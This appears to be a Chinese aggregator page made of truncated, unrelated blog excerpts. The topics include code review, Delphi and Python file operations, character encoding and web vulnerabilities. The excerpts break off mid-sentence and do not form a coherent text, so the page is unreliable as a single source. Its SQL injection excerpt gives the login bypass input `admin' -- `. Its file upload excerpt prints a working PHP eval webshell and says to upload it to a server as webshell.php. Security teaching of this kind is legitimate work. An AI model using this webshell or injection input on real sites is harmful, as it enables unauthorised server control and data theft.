做web开发,我们经常会做代码走查,很多时候,我们都会抽查一些核心功能,或者常会出现漏洞的逻辑.随着技术团队的壮大,组员技术日益成熟. 常见傻瓜型SQL注入漏洞.以及XSS漏洞.会越来越少,但是我们也会发现一些新兴的隐蔽性漏洞偶尔会出现.这些漏洞更多来自开发人员,对一个函数.常见模块功能设计不足,遗留下的问题.以前我们能够完成一些功能模块,现在要求是要安全正确方法完成模块才行. 接下来,我会分享一些常见功能模块,由于设计原因导致漏洞出现.下面,我们先看下,读取文件型功能漏洞. 我们先看下下面一段…
Delphi利用系统环境变量获取常用系统目录 //譬如 %WINDIR% 是表示系统目录的系统变量, 可以这样获取: var s: string; begin s := GetEnvironmentVariable('WINDIR'); ShowMessage(s); {C:\WINDOWS} end; 一些系统目录变量列表: --------变量-----------------------------,-------描述------------------------------------…
前面大致讲解了下客户端的安全漏洞,现在来讲解下服务端的安全漏洞. 1.SQL注入(SQL Injection),是一种常见的Web安全漏洞,攻击者利用这个漏洞,可以访问或修改数据,或者利用潜在的数据库漏洞进行攻击. 这里举个例子: 下面这个是一个正常的登录,密码为MD5加密,用户在界面输入用户名和密码后,通过post请求将值传入到后台服务器,最终通过拼接好的sql进行查询,查询返回正确则登录成功. 那么sql注入是怎么做的呢?由下图我们知道,我们用户名输入的是admin' -- ,而密码却无任何…
文件是同一种类型元素的有序集合,是内存与外设之间传输数据的渠道.文件的本质是一个数据流,所有的文件实际上是一串二进制序列.文件管理包括:1.文件操作.2.目录操作.3.驱动器操作.三部分. 1.常见文件操作函数和过程.1.1.AssignFile过程作用:将一个外部文件的文件名与一个File类型的变量关联,并对变量进行初始化.原型:procedure AssignFile(var F; FileName: String);F:一个File类型的变量,可以是任何数据类型.FileName:外部文件…
csfinal90我的:收件箱资源博客空间设置|帮助|退出 首页 业界 移动 云计算 研发 论坛 博客 下载 更多 windzb的专栏 目录视图 摘要视图 订阅 IT俱乐部创始人杜鸿飞专访      2013年10月微软MVP当选名单揭晓!    Tag功能介绍-我们为什么打Tag    "说说家乡的互联网"主题有奖征文    订阅CSDN社区周刊,及时了解社区精华内容 Delphi中文件操作的总结 [转] 2008-02-21 19:00 883人阅读 评论(0) 收藏 举报 del…
目录 1.文件操作实例 2.文件常用操作 3.with模块操作文件 常用实例,把文件里面的内容读出来做成字典的形式在做成字列表展示. 1.精简版. lst = []f = open("file01", mode="r", encoding="utf-8")for line in f: line1 = line.strip().split(",") dic = {} dic["id"] = line1[0]…
二次编码 密码本: ascii -- 没有中文 英文1字节 gbk -- 英文 8b(位) 1B(字节) 中文 16b 2B unicode -- 英文32b 4B 中文32b 4B utf-8 -- 英文8b 1B 欧洲16b 2B 亚洲24b 3B name="你好" s1=name.encode("utf-8")#编码 s2=name.encode("gbk")#编码 s2=s1.decode("utf-8")#用什么编…
#-*- coding:utf-8 -*- #文件操作 #open()函数格式 #open(文件名,访问模式) f = open('1.md',"r") #read()没有不传参数,那么会将文件全部读取出来,如果传入数字n,那么会读取n个字符 str = f.read() print(len(str)) #关闭文件 f.close() #write()函数可以将字符串写入文件中…
一.SQL注入漏洞 SQL注入攻击(SQL Injection),简称注入攻击.SQL注入,被广泛用于非法获取网站控制权,是发生在应用程序的数据库层上的安全漏洞.在设计程序,忽略了对输入字符串中夹带的SQL指令的检查,被数据库误认为是正常的SQL指令而运行,从而使数据库受到攻击,可能导致数据被窃取.更改.删除,以及进一步导致网站被嵌入恶意代码.被植入后门程序等危害. 通常情况下,SQL注入的位置包括: (1)表单提交,主要是POST请求,也包括GET请求: (2)URL参数提交,主要为GET请求…
文件上传漏洞: 一句话木马 一句话木马主要由两部分组成:执行函数与 接收被执行代码的变量 执行函数: eval() assert() create_function() array_map() array_filter() call_user_func() call_user_func_array() eval() 将字符串当作PHP代码执行,注意一定要带分号: <?php @eval($_POST['shell']);?> 将含有这个代码的PHP文件上传到服务器,命名为webshell.ph…